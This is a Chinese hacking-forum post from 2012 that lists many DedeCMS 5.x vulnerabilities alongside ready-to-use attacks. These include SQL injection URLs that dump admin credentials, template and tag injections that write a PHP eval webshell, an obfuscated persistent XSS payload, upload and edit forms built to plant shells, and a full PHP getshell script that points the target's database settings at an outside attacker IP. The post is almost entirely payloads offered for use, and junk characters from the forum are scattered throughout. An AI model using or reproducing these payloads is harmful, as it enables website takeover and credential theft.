中国网络渗透测试联盟

标题: dedecms漏洞总结 [打印本页]
作者: admin    时间: 2012-10-18 10:42
标题: dedecms漏洞总结
' e( x; i  J& O4 S/ C) P4 H/ B" Q' j
Dedecms 5.6 rss注入漏洞# w$ q9 z  K8 O* ]7 m3 |8 w, p$ s( s7 y
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
' m* G, @: `1 L# b% J0 `5 n+ ^# C+ G

& r; A, J5 p5 {. O' f
1 C5 l7 D, R1 C( z2 Z9 f% w8 c# w! f* q# H3 ~; W

  F/ J7 y/ M. g+ H. Y/ e. @7 n- f6 B2 E+ h

; S) v) J: `1 {) a+ J0 Z
& g5 r5 n. s, L$ ]4 G: UDedeCms v5.6 嵌入恶意代码执行漏洞
4 C$ i& p+ `6 l9 p- ?/ W/ ?; H/ U  ]注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
( m) l8 o# o0 H1 ~7 ?, K" s& }% I发表后查看或修改即可执行; C$ u& L3 r. ~/ I- N9 w
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
  `9 |. U# C% n- v生成x.php 密码xiao,直接生成一句话。
& U& ^7 ?) H# i$ ?9 t) t" B& m( c& g: p  c

" L7 W. b: b' m3 j& P! x2 e( L7 P7 W+ l

: w6 g) c7 e* Q3 `, H2 V" B6 l  X" k( Y) r
4 B% {0 p$ N0 i/ a6 l6 }2 f% x$ M
, t* ^$ I6 R' V3 Q" |; [0 J5 ^4 S( R

( Q" J+ P$ P1 v5 u" }0 U, UDede 5.6 GBK SQL注入漏洞3 R. i) d* \, @( G) m
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
! V+ S9 v% H! e; ^http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe2 M: s5 J) ?* K" Y
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7
: ~0 \- {' S$ N2 M0 p
! }$ n! X, B, q' I; U- e% T; E+ t+ _
$ h! d5 ~+ U$ c0 X" F" c+ h; c2 X6 c
1 ^9 i, m6 Y+ F7 w/ @

# `  R+ |+ L/ W, Y2 H
. T) C9 o8 g+ M8 G5 u0 P/ E5 A4 c; M7 ]0 P; T4 y# ]- ^/ u, d

* G% W6 R0 }# J& |* W; mDedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
: S# s% E* [' H7 Y) D" {2 e  ]7 z" whttp://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin` : N' k* ?; c/ }
3 ]% i7 w1 n( O
( i; P4 r1 O0 }: n

% C' b( G' a% P. ?! d% J0 Q7 |  A) v; A; a- q4 a# V

) K" t5 p) U* Z
- E1 }7 y8 x* o3 d8 \& D+ NDEDECMS 全版本 gotopage变量XSS漏洞
: \4 }5 Z; V3 Q8 K6 I7 D1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。 7 X9 R7 _% B0 _/ Y, @
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="0 ?$ E+ E& y% @6 H# {' {
/ m. X; {3 Z: }
3 t4 T4 g1 K+ c% K/ }+ Y& Y
2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。 ! \6 A- W& N# v6 y# r
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda* B; W8 Y" P' A1 D9 k

/ F/ E8 K7 E8 i5 B& l3 V0 L4 W; Z! l7 N: F1 y
http://v57.demo.dedecms.com/dede/login.php
. S  A5 x6 {6 Q' }. ~3 k+ F! _6 }  j8 Z: }: Q  G( P* K- {* }
& H# W" a1 G8 C% R, |
color=Red]DeDeCMS(织梦)变量覆盖getshell
% b) ?8 ~" |! ?  e+ b1 \& k. `#!usr/bin/php -w
9 m2 A; ]1 d- a1 D# p2 |+ y2 N$ ]<?php
& _* p+ g1 R5 H8 U- rerror_reporting(E_ERROR);
+ O7 f0 r- A2 [! H" Jset_time_limit(0);/ x% ~6 p3 \+ n5 D
print_r(': y& U  i+ c* `5 C
DEDEcms Variable Coverage2 s/ y5 l  n' a+ [# M7 Q
Exploit Author: www.heixiaozi.comwww.webvul.com* L, }( @$ A) V& @. L
);
0 W% a8 E6 }5 S4 n0 m  kecho "\r\n";& U& H: M# P+ D) O
if($argv[2]==null){
/ e- D/ l# U& B3 |, Aprint_r('
# J$ L# o; l* a& y+---------------------------------------------------------------------------+
% M* f4 F( G3 i, LUsage: php '.$argv[0].' url aid path
( Z/ [2 a3 K' k: K2 R( w" vaid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/5 _: S: Q$ p7 S& [) y7 q
Example:
" u; |* n8 C' e+ G+ S/ Jphp '.$argv[0].' www.site.com 1 old2 [2 N5 h0 R$ S0 ?2 k
+---------------------------------------------------------------------------+
& D- F0 {" H1 E% e; i  \');% x0 g. N& f3 g& X' I; H- {
exit;
" ~) G- k* u" X/ m) v/ Y2 R}( b- V% x/ C4 K
$url=$argv[1];+ h3 j# }* R3 J6 ^3 j( y1 ?
$aid=$argv[2];) F0 R* Z# x4 I3 H0 w
$path=$argv[3];
3 D) M. T$ z' H2 {. F, m$exp=Getshell($url,$aid,$path);
8 h: h. m; P. Q. o+ Yif (strpos($exp,"OK")>12){
. C; p* q3 u, Y0 s" l& Gecho "- ^: k/ g+ |! P( H2 p
Exploit Success \n";
( L' y6 b1 M, h6 F, Rif($aid==1)echo "
7 H2 @2 S7 R+ b: b  x0 g3 pShell:".$url."/$path/data/cache/fuck.php\n" ;3 N9 x7 M* z; J3 ~  l2 i! [

8 R# h% q; z- ?" B3 I: K% F
/ a0 }. d1 B' Z% j4 V6 V( B: p4 Vif($aid==2)echo "
0 x$ x2 t* [, zShell:".$url."/$path/fuck.php\n" ;) D2 c* _8 a% v" X! S5 X+ q

8 B% L4 f- i) \9 D4 H$ {
6 k: l7 n% A/ Hif($aid==3)echo "
  b1 r, S( Y5 [  J# N0 O; C3 uShell:".$url."/$path/plus/fuck.php\n";
2 {+ }0 E( h' a
* @* K" k" a& P1 @- X; [3 @8 S/ m- t* \- ~+ Y- F
}else{
$ w9 N  d5 U  C3 q) Becho "
- C9 l3 t; |' XExploit Failed \n";
4 k2 X4 E6 }' |  K- [}
/ ?4 D" K! }/ s$ P' Yfunction Getshell($url,$aid,$path){
7 ]1 `0 m, |& {1 N) N" N, G5 v$id=$aid;
/ h% A. q2 y0 ~7 a6 O1 L% f& o$host=$url;4 `# t9 d" M$ t1 P. W- N  X
$port="80";
0 u, M' k4 ^. X& k; \, r! [$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
, I  {5 o/ s7 n/ g+ K$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
7 i  F) `1 c1 ~) v$ o! R/ `$data .= "Host: ".$host."\r\n";! Z6 |1 V8 Y0 r- c1 Y
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";6 [6 G; Q% |6 C; ?
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
2 Q3 h3 ~% {" X+ [5 o$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";2 A% E+ e# S. k; k
//$data .= "Accept-Encoding: gzip,deflate\r\n";/ Z$ i0 x- x& ?
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
5 O  F, J% t9 R* H! e/ e' H$data .= "Connection: keep-alive\r\n";% N' q3 O) I  P5 A9 v
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
- d4 C2 k9 p) Y  L$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
1 L  c' P; N7 g! E+ P; Z$data .= $content."\r\n";
# k6 R- w( @6 ^6 Q  ~3 M" f+ B. X4 c$ock=fsockopen($host,$port);( D" e4 m7 v. ?$ U$ F
if (!$ock) {
7 ?9 k  W0 {4 n8 i4 s8 d5 Cecho "8 `# I) f, A1 z0 S
No response from ".$host."\n";' O2 i5 e7 l3 C# T% l
}
6 j4 C$ T- y3 ^fwrite($ock,$data);; I$ U9 e2 l' B3 a
while (!feof($ock)) {& {  ~; `4 o3 s- m! `# b
$exp=fgets($ock, 1024);
$ |9 a  W, B/ l+ U: kreturn $exp;
# p1 p1 r- D4 p' V0 @, o}
7 L8 K3 k9 J* Y. T$ ~}
* N9 m7 F* [) Q& o  O% Z/ b3 B
5 X# Q5 A, @7 x1 B8 Q; [
. j6 G6 O" `) g/ o?>9 {$ P' t/ t. [

6 b' G0 b4 L4 j$ L' v" H# T; L  \% i9 Y4 E
0 r6 n+ d$ ^' G

. ~- P# }. ~8 S9 B1 p8 d1 h- X' g$ C2 q& f4 C! q; U7 b

' i" u* S3 w, H8 d/ t( N0 b- c2 a. o3 o- C* m9 z; Q. t* y) N
6 c( F! s  p9 X" d* X9 @! z: r
7 a/ g; p* \) o: S( A
# U" J" b) G8 }! f9 i8 F& N  S. v
DedeCms v5.6-5.7 越权访问漏洞(直接进入后台)
+ {3 R+ f6 x) q: ?* _http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
7 j4 \/ _8 G" Z" F9 `. b
" T( H0 \/ y$ W5 H% d3 j9 _
7 F: M  I5 z& s* q) l  W: O4 U把上面validate=dcug改为当前的验证码,即可直接进入网站后台
* v4 v0 B- m  r; V" E4 M' C5 ~$ }5 F; v

' k* [, h! `+ Z. B' R0 R# V此漏洞的前提是必须得到后台路径才能实现
0 t+ x' a$ @. k" d. d' p# u) Y3 J5 I4 V, c- X  K  ~

' x" u3 f. E. X2 P- \: m# J) B: f* }9 r$ O" n8 P
) k+ p: A; C! O8 ?
9 `1 B' I. q4 y* F# O" x

8 w* T: R1 m, t+ X
  M% P9 K: n6 e5 o5 q
& y" ^  {1 {% Z2 [+ a4 |
/ h8 B/ ]+ [5 S5 u6 ]
1 F# P1 _3 d' X% {8 C+ ]4 HDedecms织梦 标签远程文件写入漏洞
$ {% _7 w* p( Q' L% n' g前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');
8 O0 o3 T: x. i) ]
& C5 g6 p' F  G7 I, I
& M) c8 @& g' P  i& P; [  z再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
' m) v( b3 a& ^3 P( b( ?+ O( P<form action="" method="post" name="QuickSearch" id="QuickSearch">/ R+ J, E2 _+ e. O" J( V% @* C1 P
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />, P  o  n$ c8 P# f
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />0 J; P$ S2 u: ?9 y$ M! t3 X9 Y
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
. l7 u3 Y- j7 M  r& A<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
/ y# C3 W- V: y6 y  h3 j<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />9 G0 ~/ o- X& l- L. g# |4 {3 c
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />/ ~4 ^: i- r( |6 e, q, y1 Z
<input type="text" value="true" name="nocache" style="width:400">: b! h7 A" E. J; n! k
<input type="submit" value="提交" name="QuickSearchBtn"><br />
  ]) z+ x3 c/ y) ?. e3 f7 Y</form>
! I6 s% }! |3 f3 Q7 a7 |<script>; A2 o" i. n7 c( B4 M
function addaction(), X& y, I- C3 P7 M. `  R
{
5 r. ?5 g/ k7 k3 i; a- Mdocument.QuickSearch.action=document.QuickSearch.doaction.value;
/ Y; q/ I6 z& F/ U! p5 U}" k( `! s1 ]: D  V* \% \- }9 h, y
</script>1 d* a; ~" f- z, a

* f9 E! q! I8 }: ?& z
+ x3 u5 L0 b, b2 }
5 H9 C7 X& e- L" M% \2 d! W
- _! p2 u6 l0 ]2 m. L2 [7 o* Y0 V
8 W. Z, g0 j7 E9 R
: F& y* ]% Z5 C$ E# q7 u) i
* F( W- T  D7 a9 Y" ]7 B5 R
# b& I2 v5 G0 M' o
( _6 e7 k* l! @0 A  D$ b4 p* C+ W
DedeCms v5.6 嵌入恶意代码执行漏洞
0 ]- `/ X$ e$ l  M注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行
2 J, X+ F9 c/ _4 [a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}8 H- o/ K6 M+ S: c: [4 g
生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得
. t( J, y3 R1 C2 bDedecms <= V5.6 Final模板执行漏洞# b# Y( Q0 L# c- p
注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:* @9 y2 S2 z$ c5 p3 a
uploads/userup/2/12OMX04-15A.jpg8 c% O8 R- t5 g- O& Y
) w* i7 k) @! @9 W" |

, g1 i2 q& [# [% {0 X6 R: f模板内容是(如果限制图片格式,加gif89a):5 _0 [3 {: ?- \$ u* M6 X6 \
{dede:name runphp='yes'}
% S% H4 v4 ?, {0 F# p$fp = @fopen("1.php", 'a');8 E' H  S( q2 z" K2 r
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");4 ^  j4 _: ?* M  d
@fclose($fp);
" \2 S) v& \2 g$ y" _$ h{/dede:name}$ u+ K) G; G  x, x7 Y
2 修改刚刚发表的文章,查看源文件,构造一个表单:
+ [# a; G, C6 I) R<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
1 k2 \4 G( c7 F* w<input type="hidden" name="dopost" value="save" />- {" l( \4 R( l5 Y: N3 T
<input type="hidden" name="aid" value="2" />
! T/ l& o  D2 ]7 D<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
2 w! i( n& D# ~9 l4 X, a<input type="hidden" name="channelid" value="1" />5 b5 Z/ N; [& Q" Y/ V7 o) r
<input type="hidden" name="oldlitpic" value="" />1 b8 x% {5 Q/ F+ \' q0 z0 f
<input type="hidden" name="sortrank" value="1275972263" />/ H9 M; L" ?4 M

- i" w1 m# o3 ]& e1 w" d, u- j* m; A# P1 l, Z' o7 |/ ^+ _
<div id="mainCp">, P2 }6 e* B- ?
<h3 class="meTitle"><strong>修改文章</strong></h3>
% L5 y; r6 h9 {4 Z0 d1 @
5 g% M8 o6 g: K1 Q9 l' J" R& y5 h9 h' d/ _7 v7 J$ V& p6 n4 p8 U; E3 y, c
<div class="postForm">" T- Q7 [9 ?0 ~: R
<label>标题:</label>
7 `- x+ K8 z, w<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
1 `& Y, y7 w  K# j/ Y# M
6 n: S( B' P$ Q, W" ]. a& v! C4 V* Y, c. F0 d7 j4 _
<label>标签TAG:</label>
& c9 W) w5 H, m4 G<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)- R8 w) j8 ?( j/ W
6 |0 O/ d# L: V& U( ~
& i8 S& A9 j: _  D0 t  W
<label>作者:</label># `+ k! Q3 }1 n$ Q% s) L! K
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>8 ^% A+ b/ m8 I6 }  v. U( O
6 F" B& {  @% [8 s! c7 ^

1 W2 f) S% ~3 S9 z<label>隶属栏目:</label>7 @( m5 H( p; E& M; ^: w( ^" S2 [
<select name='typeid' size='1'>2 d& ~; G6 L& k! M$ ^5 d3 c: g
<option value='1' class='option3' selected=''>测试栏目</option>9 ]4 ~( Y- W# p% O. c, J  |0 E" Q
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)1 v2 X, w, x/ u

6 \/ j$ E9 M% G& }3 i( P7 ?  N
( j/ }) D+ R2 m<label>我的分类:</label>
, N0 O, E/ z" `1 v( H<select name='mtypesid' size='1'>& _# K7 A6 w; p' p  f
<option value='0' selected>请选择分类...</option>, T, f: }( b% ^2 {8 U/ P/ d# j2 e: ^
<option value='1' class='option3' selected>hahahha</option>
3 A/ v& e4 ?' v6 v/ g. ]3 {</select>
3 B) i7 x' h( T# D+ G: L& }
) M& x' @4 G1 m. @: O1 ]) ?. ?  B5 X# n6 Y4 Q8 K! g/ Q
<label>信息摘要:</label>1 D5 w% O) D1 h+ y/ U) h* h/ t% a/ n2 q
<textarea name="description" id="description">1111111</textarea>
# @$ o1 p+ W) w! ~0 p+ U(内容的简要说明)
7 ]5 m* N& Q  n1 v* K0 {+ D4 P! i0 A/ @# a
$ K, X! c" X* b( L  W7 g+ z
<label>缩略图:</label>
4 a; u3 t; q: x<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
" g" ], u1 f: V8 \2 _, I. \) O' _$ ]- R) D$ w7 G

$ Y. i2 g" `4 t7 ^* a' H<input type='text' name='templet'% X& P9 Z+ x3 V2 E% w# ~6 i
value="../ uploads/userup/2/12OMX04-15A.jpg">
3 w/ J0 e4 M% N<input type='text' name='dede_addonfields'
" a8 V$ ]1 ?5 W5 N* C- c  lvalue="templet,htmltext;">(这里构造)
0 J4 \& \. J5 J! {4 H" [; }: u</div>, B2 E% U* Y0 F9 G+ R9 I7 \
1 _3 E& B  s" u

% a7 R9 j1 \7 H  V6 ]5 V7 r<!-- 表单操作区域 -->! {) T4 P% p0 n: ]  F% c/ n. c9 }
<h3 class="meTitle">详细内容</h3>
0 r8 a8 V8 a; e) u6 Y! R' D  `* h) D8 T

1 ]& v  u5 a! ~  i. P- d8 h6 q<div class="contentShow postForm">
2 \2 C6 W) d/ O# ~; B' X" |<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>' B: N, ?6 G% }! g1 ?0 E) E

/ Q& i  m% _1 k8 ~5 j, b0 a+ @4 H; j! \8 w+ r% @
<label>验证码:</label>
. |; Y9 E: s/ j! r9 q<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />6 y2 i' q/ h3 i0 j+ X8 _
<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />& P" r6 F1 A, ?

, S' T& ?5 v9 _) R) s5 I# D
: a5 _6 D* o# Y% Q$ u8 U$ a4 W<button class="button2" type="submit">提交</button>
9 Q* P: X/ k2 n; j  `/ ?<button class="button2 ml10" type="reset">重置</button>" ?" S  p& h8 s. S* S
</div>
! V8 ^+ s; M- e; G$ u. r
; D4 G0 R1 i5 r/ C: G- ~0 I+ r- l. f% x# R, n( N5 T
</div>4 @( D  g5 x7 W0 R2 r  R

2 j/ @8 C- F$ ^: v" ~+ W1 d4 a" Q; A- Z, N8 R% o
</form>/ k: z8 C; m: I" h) _
% @& t: @  _$ H+ y% U/ C& J! ?0 K

& L, ^/ g+ j# B+ F提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:# z! C/ e3 H7 v, q: _6 ^
假设刚刚修改的文章的aid为2,则我们只需要访问:
; S$ u) j2 a; \* F% E2 e# J  rhttp://127.0.0.1/dede/plus/view.php?aid=2
/ d' s& w- ~( A# z* H) l$ w$ t即可以在plus目录下生成webshell:1.php. _2 m, V1 e8 N

$ C5 V- i- S1 x! V8 h; Y7 j' G0 H+ @1 i( s' R  p# D

; S. A5 R6 ]& ]- i+ f1 }6 Q% m
. W) W4 q' N# X
1 I/ b( S! @# f7 }: E
' t& z& T6 M; z! A
3 Y9 s: M& L' _
! F* O8 Z1 X: P0 I* T( D. c8 s- L& c+ _- ?! i$ C4 Z( G* W& j
+ ^) h6 v. t8 P8 @1 ?5 Q) r" m1 T

& i' E( j9 @  M- {* N
* D7 U% C# X2 i* s2 [2 p9 GDEDECMS网站管理系统Get Shell漏洞(5.3/5.6)  s% T- b0 Y1 C5 r. j. e
Gif89a{dede:field name='toby57' runphp='yes'}# d- `; x5 F! c0 [# n5 w2 L( ^
phpinfo();
" m' t" S1 {: e* b; N/ X{/dede:field}
8 p0 {+ k: n! r. q4 ^7 u6 s* B保存为1.gif8 {- \' ?" ~/ ^# x, L
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" ">
, `8 V; t# F- y1 r( T( C) [<input type="hidden" name="aid" value="7" />   q! F# Y! O( T
<input type="hidden" name="mediatype" value="1" />
. t, v. x0 O7 _% X0 G8 [<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br> % |" j$ J6 [5 s: d: g
<input type="hidden" name="dopost" value="save" /> " h( v0 w- \, V; j  f, G- i
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/> * b/ U9 [3 P3 X3 z) z: \" Q! H/ j$ L
<input name="addonfile" type="file" id="addonfile"/>
  p3 ]# C9 ?+ X3 `7 g' ]<button class="button2" type="submit" >更改</button>
6 x9 b* C; C9 m& P$ Z" _% Y</form> ' ]2 R, g" R+ ~& T8 H4 X! r
8 Y2 w3 L  D( ~0 b  u5 J
2 ~$ ]* A: C" G% V
构造如上表单,上传后图片保存为/uploads/userup/3/1.gif
  G1 f: I& G9 x; T发表文章,然后构造修改表单如下:
3 W4 q2 X3 p" \9 i& b# F* f
$ x4 s1 ^2 j: t" r; _  z: c) i/ e3 K: Z
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
1 H" g! j' p3 Q8 W! N# r* ?3 o<input type="hidden" name="dopost" value="save" /> 0 x; F- t  x+ F$ c  n& O9 n; \
<input type="hidden" name="aid" value="2" />
7 V" Q" q, J: M& a6 ]- W<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
- k- l" H' ^% j1 h/ h<input type="hidden" name="channelid" value="1" />
2 p' _  \: v/ t4 P  Z4 Q' X4 Y<input type="hidden" name="oldlitpic" value="" /> - I( S( S. O, R8 K. f- z) f4 s5 L) l- o5 N
<input type="hidden" name="sortrank" value="1282049150" /> / X5 k! ~) p+ C2 i) J1 ~
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
( c/ }: a% C: I9 L<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/> 8 ^8 @+ z0 q0 G" A: B: n
<select name='typeid' size='1'> . R# w, o9 z) I% \& A5 r/ `$ G9 E! p
<option value='1' class='option3' selected=''>Test</option>
4 y! k5 u* b- }' h3 {# V9 ^: j<select name='mtypesid' size='1'> ; I( k% a/ \$ s* L9 v
<option value='0' selected>请选择分类...</option> 6 v5 }; i1 r9 D: Y1 [4 |" t: T" b
<option value='1' class='option3' selected>aa</option></select>
/ T7 O2 F" j, r* b& E, _$ f/ Y- u<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
/ P% v8 M, W! v( l<input type='hidden' name='dede_addonfields' value="templet"> * ~) b: \* }5 |5 M( \# \- ?
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif"> - ~% F2 Z& d2 @) \1 K, r3 D7 t
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" /> & [1 E9 f: y( r$ l! m  }5 s
<button class="button2" type="submit">提交</button>
  p7 @" T0 H' m6 t</form>
. Y* X; N; y; q0 }- i4 m5 d1 {* B  }! [8 i+ K# c" Y" q# q) F2 z  Z
" K# X9 X3 F- W# Y# K
( l) e/ C" X( k" G
9 q! y9 ?! y6 T6 B

+ v0 `; T$ f; B/ K+ k; z& d9 M( x6 z: g& a8 k' x/ f+ U

; `, v% H5 N$ g
0 p* g4 l- h* h: B3 Y/ x5 g+ d! P/ l6 x' ~* b$ _

1 [. C8 y6 c( w( h
/ U# V& L3 ]1 e5 `
' F) x3 G' H) t' C4 `织梦(Dedecms)V5.6 远程文件删除漏洞
& d, ~. b& G7 t. _5 k* H& y: Fhttp://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif# U( \" U, Y& x% h9 E- l

5 `+ L+ W( P1 s, d: v1 Y  ?' i$ \6 w/ v" k) ^4 O3 H
4 H5 w. o- N) v

. q2 U: R+ X4 o0 i5 [- O! O
  Q% T& @  [9 q( B: @& ]2 E9 F
$ b0 I- h0 ?0 |/ ~9 l: X( I1 B" W9 e6 p9 d7 I3 [$ o

+ s8 |0 K  ?# x4 H/ S) {
. K0 F+ M1 m5 I$ h+ ?
0 e6 B: c( Q/ n9 Y织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞
3 w/ j  ^" |- s* e  ghttp://www.test.com/plus/carbuya ... urn&code=../../3 t5 V+ ?8 R" h" d9 X/ L5 q
3 b) B" `2 l8 F. B5 d

. Z1 U: U) S9 I1 Z6 G, T
9 u  @% k# a. F7 H0 i) X$ ^6 w% R+ f' z) i2 }
  n# n5 O) v1 |# _# x- f

. s! }* ]; L: k  B6 b3 a: T! X- c$ \9 u* E6 n

8 V) N: K- c  I6 u1 a  D. E6 ]* `/ a' {' B. g! l9 H

4 W- V8 d$ |9 h1 b2 D" oDedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞 " I* n6 u4 L4 ]& H9 n( Q
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
( h3 D. z' d( e0 T4 d9 B密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5
1 _/ x; K. w! _5 D& z
* c- Z9 C0 n2 d, h" ~2 m! @1 H4 ~7 u3 n" |: z) t$ ]% B' R
/ n9 m9 g8 x5 x( A+ W

6 p; Q: x1 K+ h& G, d7 K3 h+ {9 j2 U3 y4 j$ f1 r- ^9 @

3 \) m) v, b) g$ V  A5 E6 j/ l9 z* t: X: L+ o5 p
- U* g/ `4 r0 ~, _0 w
, d  o. s& F+ {, Y. P1 p8 Y+ ~
2 w6 i1 F, L9 ?9 r' ]
织梦(Dedecms) 5.1 feedback_js.php 注入漏洞9 ]) F4 N' i% ^' _- \5 ^( r
